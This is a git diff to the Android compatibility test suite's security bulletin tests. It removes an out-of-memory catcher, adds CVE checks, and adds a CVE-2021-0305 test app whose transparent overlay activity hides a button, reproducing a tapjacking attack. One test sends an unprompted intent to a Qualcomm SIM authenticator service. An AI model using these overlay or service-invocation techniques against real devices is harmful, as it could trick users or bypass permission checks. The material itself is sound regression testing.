Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, - "Device " + serial + " has " + totalMemory + "KB total memory."); - totalMemories.put(serial, totalMemory); - } - return totalMemory; - } - - /** - * Start the hostside oom catcher thread for the test. - * Match this call to SecurityTestCase.setup(). - */ - public synchronized void start() throws Exception { - long totalMemory = getMemTotal(getDevice()); - isLowMemoryDevice = totalMemory < LOW_MEMORY_DEVICE_THRESHOLD_KB; - - // reset test oom behavior - // Devices should fail tests that OOM so that they'll be ran again with --retry. - // If the test OOMs because previous tests used the memory, it will likely pass - // on a second try. - oomBehavior = OomBehavior.FAIL_AND_LOG; - oomDetected = false; - - // Cache OOM detection in separate persistent threads for each device. - WeakReference<BackgroundDeviceAction> reference = - oomCatchers.get(getDevice().getSerialNumber()); - BackgroundDeviceAction oomCatcher = null; - if (reference != null) { - oomCatcher = reference.get(); - } - if (oomCatcher == null || !oomCatcher.isAlive() || oomCatcher.isCancelled()) { - AdbUtils.runCommandLine("am start com.android.cts.oomcatcher/.OomCatcher", getDevice()); - - oomCatcher = new BackgroundDeviceAction( - "logcat -c && logcat OomCatcher:V *:S", - "Oom Catcher background thread", - getDevice(), new OomReceiver(getDevice()), 0); - - oomCatchers.put(getDevice().getSerialNumber(), new WeakReference<>(oomCatcher)); - oomCatcher.start(); - } - } - - /** - * Stop the hostside oom catcher thread. - * Match this call to SecurityTestCase.setup(). - */ - public static void stop(String serial) { - WeakReference<BackgroundDeviceAction> reference = oomCatchers.get(serial); - if (reference != null) { - BackgroundDeviceAction oomCatcher = reference.get(); - if (oomCatcher != null) { - oomCatcher.cancel(); - } - } - } - - /** - * Check every test teardown to see if the device oomed during the test. - */ - public synchronized boolean isOomDetected() { - return oomDetected; - } - - /** - * Return the current test behavior for when oom is detected. - */ - public synchronized OomBehavior getOomBehavior() { - return oomBehavior; - } - - /** - * Flag meaning the test will likely fail on devices with low memory. - */ - public synchronized void setHighMemoryTest() { - if (isLowMemoryDevice) { - oomBehavior = OomBehavior.PASS_AND_LOG; - } else { - oomBehavior = OomBehavior.FAIL_AND_LOG; - } - } - - /** - * Flag meaning the test uses the OOM catcher to fail the test because the test vulnerability - * intentionally OOMs the device. - */ - public synchronized void setOomTest() { - oomBehavior = OomBehavior.FAIL_NO_LOG; - } - - private ITestDevice getDevice() { - return context.getDevice(); - } - - /** - * Read through logcat to find when the OomCatcher app reports low memory. Once detected, reboot - * the device to prevent a soft reset with the possiblity of ADB becomming unresponsive. - */ - class OomReceiver extends MultiLineReceiver { - - private ITestDevice device = null; - private boolean isCancelled = false; - - public OomReceiver(ITestDevice device) { - this.device = device; - } - - @Override - public void processNewLines(String[] lines) { - for (String line : lines) { - if (Pattern.matches(".*Low memory.*", line)) { - // low memory detected, reboot device to clear memory and pass test - isCancelled = true; - Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, - "lowmemorykiller detected; rebooting device."); - synchronized (HostsideOomCatcher.this) { // synchronized for oomDetected - oomDetected = true; // set HostSideOomCatcher var - } - try { - device.nonBlockingReboot(); - device.waitForDeviceOnline(60 * 2 * 1000); // 2 minutes - } catch (Exception e) { - Log.e(LOG_TAG, e.toString()); - } - return; // we don't need to process remaining lines in the array - } - } - } - - @Override - public boolean isCancelled() { - return isCancelled; - } - } -} - diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java index 39b7ada09f6..0895607d122 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java @@ -44,7 +44,6 @@ public class Poc16_05 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2016-05") public void testPocCVE_2015_1805() throws Exception { - getOomCatcher().setHighMemoryTest(); AdbUtils.runPoc("CVE-2015-1805", getDevice(), TIMEOUT_NONDETERMINISTIC); } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java index 4367a61a149..835c1cf51f3 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java @@ -58,7 +58,6 @@ public class Poc16_07 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2016-07") public void testPocCVE_2016_3747() throws Exception { - getOomCatcher().setHighMemoryTest(); AdbUtils.runPocAssertNoCrashes("CVE-2016-3747", getDevice(), "mediaserver"); } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java index 44b0d892484..dc41d7c201f 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java @@ -33,7 +33,6 @@ public class Poc18_04 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2018-04") public void testPocCVE_2017_13286() throws Exception { - getOomCatcher().setHighMemoryTest(); LaunchSomeWhere.launchSomeWhere("CVE_2017_13286", getDevice()); } @@ -44,7 +43,6 @@ public class Poc18_04 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2018-04") public void testPocCVE_2017_13288() throws Exception { - getOomCatcher().setHighMemoryTest(); LaunchSomeWhere.launchSomeWhere("CVE_2017_13288", getDevice()); } @@ -55,7 +53,6 @@ public class Poc18_04 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2018-04") public void testPocCVE_2017_13289() throws Exception { - getOomCatcher().setHighMemoryTest(); LaunchSomeWhere.launchSomeWhere("CVE_2017_13289", getDevice()); } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java index 6b51f0a6b11..e3128f1212e 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java @@ -33,7 +33,6 @@ public class Poc18_05 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2018-05") public void testPocCVE_2017_13315() throws Exception { - getOomCatcher().setHighMemoryTest(); LaunchSomeWhere.launchSomeWhere("CVE_2017_13315", getDevice()); } @@ -44,7 +43,6 @@ public class Poc18_05 extends SecurityTestCase { @Test @SecurityTest(minPatchLevel = "2018-05") public void testPocCVE_2017_13312() throws Exception { - getOomCatcher().setHighMemoryTest(); LaunchSomeWhere.launchSomeWhere("CVE_2017_13312", getDevice()); } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java index 172f0fc300c..64929d9fc24 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java @@ -35,4 +35,26 @@ public class Poc18_07 extends SecurityTestCase { AdbUtils.runPocAssertNoCrashes( "CVE-2018-9424", getDevice(), "android\\.hardware\\.drm@\\d\\.\\d-service"); } + + /* + * CVE-2017-18275 + */ + @Test + @SecurityTest(minPatchLevel = "2018-07") + public void testPocCVE_2017_18275() throws Exception { + String command = + "am startservice " + + "-n com.qualcomm.simcontacts/com.qualcomm.simcontacts.SimAuthenticateService " + + "-a android.accounts.AccountAuthenticator -e account_name cve_2017_18275"; + String result = AdbUtils.runCommandLine( + "pm list packages | grep com.qualcomm.simcontacts", getDevice()); + if (result.contains("com.qualcomm.simcontacts")) { + AdbUtils.runCommandLine("logcat -c", getDevice()); + AdbUtils.runCommandLine(command, getDevice()); + String logcat = AdbUtils.runCommandLine("logcat -d", getDevice()); + assertNotMatchesMultiLine( + "Authenticator: Add SIM account.*ContactsProvider: Accounts changed", + logcat); + } + } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java new file mode 100644 index 00000000000..9c60f67b871 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_04.java @@ -0,0 +1,39 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +import static org.junit.Assert.*; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class Poc19_04 extends SecurityTestCase { + + /** + * CVE-2018-13895 + */ + @Test + @SecurityTest(minPatchLevel = "2019-04") + public void testPocCVE_2018_13895() throws Exception { + String result = AdbUtils.runCommandLine( + "pm list package com.suntek.mway.rcs.app.service",getDevice()); + assertFalse(result.contains("com.suntek.mway.rcs.app.service")); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java b/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java index fe8c239ad95..07f45db0d4e 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/PocPusher.java @@ -133,8 +133,8 @@ public class PocPusher extends TestWatcher { } testFile += bitness; } - File localFile = buildHelper.getTestFile(testFile); CLog.i("Pushing local: %s to remote: %s", testFile.toString(), remoteFile); + File localFile = buildHelper.getTestFile(testFile); device.pushFile(localFile, remoteFile); if (cleanup) { filesToCleanup.add(remoteFile); diff --git a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java index 10137a0ae46..5dc459059d9 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java @@ -58,7 +58,6 @@ public class SecurityTestCase extends BaseHostJUnit4Test { private long kernelStartTime; - private HostsideOomCatcher oomCatcher = new HostsideOomCatcher(this); private HostsideMainlineModuleDetector mainlineModuleDetector = new HostsideMainlineModuleDetector(this); @Rule public TestName testName = new TestName(); @@ -80,7 +79,6 @@ public class SecurityTestCase extends BaseHostJUnit4Test { // TODO:(badash@): Watch for other things to track. // Specifically time when app framework starts - oomCatcher.start(); sBuildInfo.put(getDevice(), getBuild()); sAbi.put(getDevice(), getAbi()); sTestName.put(getDevice(), testName.getMethodName()); @@ -95,8 +93,6 @@ public class SecurityTestCase extends BaseHostJUnit4Test { */ @After public void tearDown() throws Exception { - oomCatcher.stop(getDevice().getSerialNumber()); - try { getDevice().waitForDeviceAvailable(90 * 1000); } catch (DeviceNotAvailableException e) { @@ -105,27 +101,11 @@ public class SecurityTestCase extends BaseHostJUnit4Test { getDevice().waitForDeviceAvailable(30 * 1000); } - if (oomCatcher.isOomDetected()) { - // we don't need to check kernel start time if we intentionally rebooted because oom - updateKernelStartTime(); - switch (oomCatcher.getOomBehavior()) { - case FAIL_AND_LOG: - fail("The device ran out of memory."); - break; - case PASS_AND_LOG: - Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, "Skipping test."); - break; - case FAIL_NO_LOG: - fail(); - break; - } - } else { - long deviceTime = getDeviceUptime() + kernelStartTime; - long hostTime = System.currentTimeMillis() / 1000; - assertTrue("Phone has had a hard reset", (hostTime - deviceTime) < 2); + long deviceTime = getDeviceUptime() + kernelStartTime; + long hostTime = System.currentTimeMillis() / 1000; + assertTrue("Phone has had a hard reset", (hostTime - deviceTime) < 2); - // TODO(badash@): add ability to catch runtime restart - } + // TODO(badash@): add ability to catch runtime restart } public static IBuildInfo getBuildInfo(ITestDevice device) { @@ -231,7 +211,22 @@ public class SecurityTestCase extends BaseHostJUnit4Test { * Check if a driver is present on a machine. */ protected boolean containsDriver(ITestDevice device, String driver) throws Exception { - boolean containsDriver = AdbUtils.runCommandGetExitCode("test -r " + driver, device) == 0; + boolean containsDriver = false; + if (driver.contains("*")) { + // -A list all files but . and .. + // -d directory, not contents + // -1 list one file per line + // -f unsorted + String ls = "ls -A -d -1 -f " + driver; + if (AdbUtils.runCommandGetExitCode(ls, device) == 0) { + String[] expanded = device.executeShellCommand(ls).split("\\R"); + for (String expandedDriver : expanded) { + containsDriver |= containsDriver(device, expandedDriver); + } + } + } else { + containsDriver = AdbUtils.runCommandGetExitCode("test -r " + driver, device) == 0; + } MetricsReportLog reportLog = buildMetricsReportLog(getDevice()); reportLog.addValue("path", driver, ResultType.NEUTRAL, ResultUnit.NONE); @@ -293,10 +288,6 @@ public class SecurityTestCase extends BaseHostJUnit4Test { kernelStartTime = (System.currentTimeMillis() / 1000) - uptime; } - public HostsideOomCatcher getOomCatcher() { - return oomCatcher; - } - /** * Return true if a module is play managed. * diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java index 987e3e3ee12..c596244b5ad 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java @@ -111,6 +111,7 @@ public class TestMedia extends SecurityTestCase { @SecurityTest(minPatchLevel = "2020-11") @Test public void testPocCVE_2020_0450() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0450", null, getDevice()); } @@ -166,6 +167,7 @@ public class TestMedia extends SecurityTestCase { @SecurityTest(minPatchLevel = "2019-08") @Test public void testPocCVE_2019_2133() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2133", null, getDevice()); } @@ -176,6 +178,7 @@ public class TestMedia extends SecurityTestCase { @SecurityTest(minPatchLevel = "2019-08") @Test public void testPocCVE_2019_2134() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2134", null, getDevice()); } @@ -528,7 +531,11 @@ public class TestMedia extends SecurityTestCase { String binaryName = "CVE-2018-9537"; String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT}; AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice()); - testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName); + // example of check crash to skip: + // Abort message: 'frameworks/av/media/extractors/mkv/MatroskaExtractor.cpp:548 CHECK(mCluster) failed.' + testConfig.config = new CrashUtils.Config() + .setProcessPatterns(binaryName) + .appendAbortMessageExcludes("CHECK\\(.*?\\)"); testConfig.config.setSignals(signals); AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); } diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp new file mode 100644 index 00000000000..70015337024 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp @@ -0,0 +1,31 @@ +// Copyright (C) 2021 The Android Open Source Project +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +android_test_helper_app { + name: "CVE-2021-0305", + defaults: ["cts_support_defaults"], + srcs: ["src/**/*.java"], + test_suites: [ + "cts", + "vts10", + "sts", + ], + static_libs: [ + "androidx.test.rules", + "androidx.test.uiautomator_uiautomator", + "androidx.test.core", + ], + sdk_version: "current", +} + diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml new file mode 100644 index 00000000000..07131a62ac4 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml @@ -0,0 +1,51 @@ +<?xml version="1.0" encoding="utf-8"?> +<!-- + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + --> + +<manifest xmlns:android="http://schemas.android.com/apk/res/android" + xmlns:tools="http://schemas.android.com/tools" + package="android.security.cts.CVE_2021_0305" + android:targetSandboxVersion="2"> + + <uses-permission android:name="android.permission.CAMERA" /> + <uses-permission android:name="android.permission.RECORD_AUDIO" /> + + <application> + <uses-library android:name="android.test.runner" /> + <activity + android:name=".MainActivity" + android:label="ST (Permission)" + android:taskAffinity="android.security.cts.CVE_2021_0305.MainActivity" + android:exported="true"> + + <intent-filter> + <action android:name="android.intent.action.MAIN" /> + <category android:name="android.intent.category.LAUNCHER" /> + </intent-filter> + </activity> + + <activity + android:name=".OverlayActivity" + android:theme="@style/OverlayTheme" + android:exported="true"/> + + </application> + + <instrumentation + android:name="androidx.test.runner.AndroidJUnitRunner" + android:targetPackage="android.security.cts.CVE_2021_0305" /> + +</manifest> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml new file mode 100644 index 00000000000..20a9812c5dc --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml @@ -0,0 +1,24 @@ +<?xml version="1.0" encoding="utf-8"?> +<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" + android:orientation="vertical" + android:layout_width="match_parent" + android:layout_height="match_parent" + xmlns:tools="http://schemas.android.com/tools" + xmlns:app="http://schemas.android.com/apk/res-auto" + tools:context=".MainActivity"> + + <TextView + android:layout_width="wrap_content" + android:layout_height="wrap_content" + android:text="@string/sample_text" + /> + + <Button + android:id="@+id/testButton1" + android:layout_width="wrap_content" + android:layout_height="wrap_content" + android:text="@string/test_button_label" + android:layout_centerInParent="true" + android:gravity="end|center_vertical" + /> +</LinearLayout> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml new file mode 100644 index 00000000000..815602c6edf --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml @@ -0,0 +1,28 @@ +<resources> + + <attr name="colorOverlay" format="color" /> + <attr name="colorDialog" format="color" /> + <attr name="projectAlpha" format="float" /> + + <!-- Switch between the two to see what's happening behind the attacks --> + <style name="AppTheme" parent="SeeBehind"/> + <!--<style name="AppTheme" parent="AppThemeBase.SeeBehind"/>--> + + <style name="SeeBehind"> + <item name="colorOverlay">#BB4BEFD7</item> + <item name="colorDialog">#88FFFFFF</item> + <item name="projectAlpha">0.0</item> + </style> + + <color name="colorM">#5600D1</color> + + <style name="OverlayTheme" parent="AppTheme"> + <!--<item name="android:windowBackground">@color/colorM</item>--> + <item name="android:windowBackground">@android:color/transparent</item> + <item name="android:windowAnimationStyle">@null</item> + <item name="android:windowIsTranslucent">true</item> + </style> + + + +</resources> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml new file mode 100644 index 00000000000..ab8b450c5fb --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml @@ -0,0 +1,5 @@ +<resources> + <string name="app_name">CVE_2021_0305</string> + <string name="test_button_label">Test Button</string> + <string name="sample_text">text in activity</string> +</resources>
\ No newline at end of file diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java new file mode 100644 index 00000000000..5634f4f55bb --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java @@ -0,0 +1,142 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts.CVE_2021_0305; + +import org.junit.Before; +import org.junit.After; +import org.junit.Test; +import org.junit.runner.RunWith; + +import android.content.Context; +import android.content.Intent; +import android.content.pm.PackageManager; +import android.content.pm.ResolveInfo; +import android.os.SystemClock; +import android.util.Log; + +import static androidx.test.core.app.ApplicationProvider.getApplicationContext; +import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation; +import androidx.test.filters.SdkSuppress; +import androidx.test.runner.AndroidJUnit4; +import androidx.test.uiautomator.By; +import androidx.test.uiautomator.UiDevice; +import androidx.test.uiautomator.UiObject2; +import androidx.test.uiautomator.Until; +import androidx.test.uiautomator.BySelector; + +import static org.hamcrest.CoreMatchers.equalTo; +import static org.hamcrest.CoreMatchers.is; +import static org.hamcrest.CoreMatchers.notNullValue; +import static org.junit.Assert.assertThat; +import static org.junit.Assert.assertFalse; + +/** + * Basic sample for unbundled UiAutomator. + */ +@RunWith(AndroidJUnit4.class) +public class DeviceTest { + + private static final String BASIC_SAMPLE_PACKAGE + = "android.security.cts.CVE_2021_0305"; + private static final int LAUNCH_TIMEOUT_MS = 20000; + private static final String STRING_TO_BE_TYPED = "UiAutomator"; + + private UiDevice mDevice; + + @Before + public void startMainActivityFromHomeScreen() { + + Log.d("CVE", "startMainActivityFromHomeScreen()"); + + // Initialize UiDevice instance + mDevice = UiDevice.getInstance(getInstrumentation()); + + // Start from the home screen + mDevice.pressHome(); + + // Launch the blueprint app + Context context = getApplicationContext(); + assertThat(context, notNullValue()); + PackageManager packageManager = context.getPackageManager(); + assertThat(packageManager, notNullValue()); + final Intent intent = packageManager.getLaunchIntentForPackage(BASIC_SAMPLE_PACKAGE); + assertThat(intent, notNullValue()); + + intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK); // Clear out any previous instances + context.startActivity(intent); + + // Wait for the app to appear + Log.d("CVE", "wait for the app to appear"); + mDevice.wait(Until.hasObject(By.pkg(BASIC_SAMPLE_PACKAGE).depth(0)), LAUNCH_TIMEOUT_MS); + Log.d("CVE", "app appeared"); + } + + @After + public void lastOperation(){ + Log.d("CVE", "lastOperation() wait 20s"); + SystemClock.sleep(20000); + Log.d("CVE", "lastOperation() completed"); + } + + @Test + public void testClick() { + Log.d("CVE", "testClick()"); + boolean clicked = false; + java.util.List<UiObject2> objects; + BySelector selector = By.clickable(true); + String button; + + //Detect "Test Button". + //"Test Button" appears after onResume(). + //mDevice.wait(Until.hasObject(By.pkg(BASIC_SAMPLE_PACKAGE).depth(0)), LAUNCH_TIMEOUT_MS); + //waits for onEnterAnimationComplete() to finish. + //So we have LAUNCH_TIMEOUT_MS for the button to appear. + //If the button it still not available then + //we assume the button is obscured and the test passes. + Log.d("CVE", "looking for clickable"); + objects = mDevice.findObjects(selector); + for (UiObject2 o : objects) { + button = o.getText(); + Log.d("CVE", "button:" + button); + + if(button==null){ + //check the next button + continue; + } + + switch(button){ + case "Test Button" : + o.click(); + clicked=true; + Log.i("CVE", "clicked: Test Button"); + break; + default : + //check the next button + continue; + } + + //A button this test is looking for just got pressed. + //Ignore remaining buttons + break; + } + + Log.d("CVE", "testClick() end"); + assertFalse(clicked); + Log.d("CVE", "testClick() passed"); + } +} + diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java new file mode 100644 index 00000000000..50a16228d3e --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java @@ -0,0 +1,64 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts.CVE_2021_0305; + +import android.app.Activity; +import android.content.Intent; +import android.content.pm.PackageManager; +import android.Manifest.permission; +import android.os.Bundle; +import android.os.Handler; +import android.view.View; +import android.widget.EditText; +import android.widget.TextView; +import android.util.Log; +import android.widget.Button; +import android.os.SystemClock; +import static android.content.Intent.FLAG_ACTIVITY_NO_ANIMATION; + + +public class MainActivity extends Activity { + + private static final int REQUEST_CAMERA_PERMISSION = 0; + Button testButton1; + + @Override + public void onCreate(Bundle b) { + super.onCreate(b); + Log.e("CVE", "onCreate"); + setContentView(R.layout.activity_main); + testButton1 = (Button) findViewById(R.id.testButton1);//get id of button + + testButton1.setOnClickListener(new View.OnClickListener() { + @Override + public void onClick(View view) { + Log.d("CVE", "button click received"); + } + }); + } + + @Override + public void onEnterAnimationComplete() { + super.onEnterAnimationComplete(); + Log.d("CVE", "MainActivity.onEnterAnimationComplete()"); + + //open OverlayActivity to obstruct MainActivity + Intent intent = new Intent(this, OverlayActivity.class); + intent.setFlags(FLAG_ACTIVITY_NO_ANIMATION); + startActivity(intent); + } +} diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java new file mode 100644 index 00000000000..c320e5a9640 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java @@ -0,0 +1,4 @@ +package android.security.cts.CVE_2021_0305; +import android.app.Activity; + +public class OverlayActivity extends Activity {} diff --git a/hostsidetests/stagedinstall/app/src/com/android/tests/stagedinstall/PackageInstallerSessionInfoSubject.java b/hostsidetests/stagedinstall/app/src/com/android/tests/stagedinstall/PackageInstallerSessionInfoSubject.java index e78e5f32ffc..4186ba16cf1 100644 --- a/hostsidetests/stagedinstall/app/src/com/android/tests/stagedinstall/PackageInstallerSessionInfoSubject.java +++ b/hostsidetests/stagedinstall/app/src/com/android/tests/stagedinstall/PackageInstallerSessionInfoSubject.java @@ -26,10 +26,12 @@ import javax.annotation.Nullable; final class PackageInstallerSessionInfoSubject extends Subject<PackageInstallerSessionInfoSubject, PackageInstaller.SessionInfo> { + private final PackageInstaller.SessionInfo mActual; private PackageInstallerSessionInfoSubject(FailureMetadata failureMetadata, @Nullable PackageInstaller.SessionInfo subject) { super(failureMetadata, subject); + mActual = subject; } private static Subject.Factory<PackageInstallerSessionInfoSubject, @@ -50,18 +52,15 @@ final class PackageInstallerSessionInfoSubject extends } public void isStagedSessionReady() { - check().withMessage(failureMessage("in state READY")).that( - getSubject().isStagedSessionReady()).isTrue(); + check(failureMessage("in state READY")).that(mActual.isStagedSessionReady()).isTrue(); } public void isStagedSessionApplied() { - check().withMessage(failureMessage("in state APPLIED")).that( - getSubject().isStagedSessionApplied()).isTrue(); + check(failureMessage("in state APPLIED")).that(mActual.isStagedSessionApplied()).isTrue(); } public void isStagedSessionFailed() { - check().withMessage(failureMessage("in state FAILED")).that( - getSubject().isStagedSessionFailed()).isTrue(); + check(failureMessage("in state FAILED")).that(mActual.isStagedSessionFailed()).isTrue(); } private String failureMessage(String suffix) { @@ -69,12 +68,11 @@ final class PackageInstallerSessionInfoSubject extends } private String subjectAsString() { - PackageInstaller.SessionInfo session = getSubject(); - return "{" + "appPackageName = " + session.getAppPackageName() + "; " - + "sessionId = " + session.getSessionId() + "; " - + "isStagedSessionReady = " + session.isStagedSessionReady() + "; " - + "isStagedSessionApplied = " + session.isStagedSessionApplied() + "; " - + "isStagedSessionFailed = " + session.isStagedSessionFailed() + "; " - + "stagedSessionErrorMessage = " + session.getStagedSessionErrorMessage() + "}"; + return "{" + "appPackageName = " + mActual.getAppPackageName() + "; " + + "sessionId = " + mActual.getSessionId() + "; " + + "isStagedSessionReady = " + mActual.isStagedSessionReady() + "; " + + "isStagedSessionApplied = " + mActual.isStagedSessionApplied() + "; " + + "isStagedSessionFailed = " + mActual.isStagedSessionFailed() + "; " + + "stagedSessionErrorMessage = " + mActual.getStagedSessionErrorMessage() + "}"; } } diff --git a/libs/rollback/src/com/android/cts/rollback/lib/RollbackInfoSubject.java b/libs/rollback/src/com/android/cts/rollback/lib/RollbackInfoSubject.java index 684f0ec03c3..9f912e0ead3 100644 --- a/libs/rollback/src/com/android/cts/rollback/lib/RollbackInfoSubject.java +++ b/libs/rollback/src/com/android/cts/rollback/lib/RollbackInfoSubject.java @@ -33,6 +33,8 